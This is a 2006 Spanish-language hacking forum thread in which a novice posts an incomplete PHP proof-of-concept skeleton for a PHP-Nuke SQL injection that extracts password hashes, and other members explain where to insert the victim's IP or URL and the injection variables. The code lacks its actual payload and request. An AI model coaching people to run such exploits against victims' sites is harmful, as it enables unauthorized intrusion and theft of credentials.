Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 05:55:28
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Duda con exploit despues de ejecutar 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Duda con exploit despues de ejecutar  (Leído 411 veces)
h4ckb0y
Miembro
*****
Desconectado Desconectado

Mensajes: 20


Ver Perfil
« en: Diciembre 24, 2006, 08:33:25 »
Código:
<?
/*

Neo Security Team - Pseudo-Code Proof of Concept Exploit
http://www.neosecurityteam.net
Paisterist

*/
set_time_limit(0);
$host="localhost";
$path="/phpnuke/";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data=""; /* Here the variables, like "bywhat" and "forwhat", with the
SQL Injection */

if ($fp) {
    /* we put the POST request on $p variable, sending the data saved on
$data. */

    fwrite($fp, $p);

    while (!feof($fp)) {
        $content .= fread($fp, 4096);
    }

    preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

    if ($matches[0])
    print "<b>Hash: </b>".$matches[0];
}
?>


Lo compilo y ejecuto, pasa un tiempo y termina y no hace na, donde envia el hash?
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
WiNsMuRf
Colaborador
*****
Desconectado Desconectado

Mensajes: 858


Tux Rlz!


Ver Perfil WWW
« Respuesta #1 en: Diciembre 24, 2006, 10:12:27 »
yo tambien dudo de la funcionalidad de ese exploit

que tal si cambias el ultimo print por un echo??

saludos
En línea





No respondo mensajes privados ni atiendo en el messenger..
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2144


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #2 en: Diciembre 24, 2006, 11:57:10 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #3 en: Diciembre 24, 2006, 01:34:29 »
En línea



 Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
zickox
Visitante
« Respuesta #4 en: Diciembre 24, 2006, 03:43:04 »
« Última modificación: Diciembre 24, 2006, 03:44:12 por zickox » En línea
h4ckb0y
Miembro
*****
Desconectado Desconectado

Mensajes: 20


Ver Perfil
« Respuesta #5 en: Diciembre 25, 2006, 05:20:08 »
Si lo compile configurado, puse el exploit original aki, pero ya sabia k tniak e modifikarlo aunke en

$fp = fsockopen
$data= ""

no lo tngo claro. tengo que meter una inyeccion sql ?
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #6 en: Diciembre 26, 2006, 08:55:08 »
Citar
Claro que es para una web, este exploit es para phpnuke xD, explota el bug con una sql inyeccion  y ya sabes hackboy kambia el valor de la variable $host por la ip de tu victima  Tongue

salu2!!

PD: el path lo dice todo  Tongue

 Solamente la ip?? jejeje te falta unas cosas....  Cheesy

Citar
$host="localhost";
Aca va la IP

Citar
$fp = fsockopen($host, $port, $errno, $errstr, 30);
Aqui pone el host y el puerto

Citar
$data=""; /* Here the variables, like "bywhat" and "forwhat", with the
SQL Injection */
Como bien dice, alli van las variables de porque y paraque de la inyeccion sql.

Lo demas lo dejas como esta....

 PD: Empiesa con la teoria primero amigo no es tan facil usar los exploits... va algunos son una pabada  Tongue

 Pr0gr4mer
 
« Última modificación: Diciembre 26, 2006, 08:56:28 por Pr0gr4mer » En línea



 Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
WiNsMuRf
Colaborador
*****
Desconectado Desconectado

Mensajes: 858


Tux Rlz!


Ver Perfil WWW
« Respuesta #7 en: Diciembre 28, 2006, 06:53:49 »
Citar
Citar
$host="localhost";
Aca va la IP

No necesariamente la ip...
puede ir la url, algo asi como

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.victima.com

saludos
En línea





No respondo mensajes privados ni atiendo en el messenger..
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre)  |  Tema: Duda con exploit despues de ejecutar « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC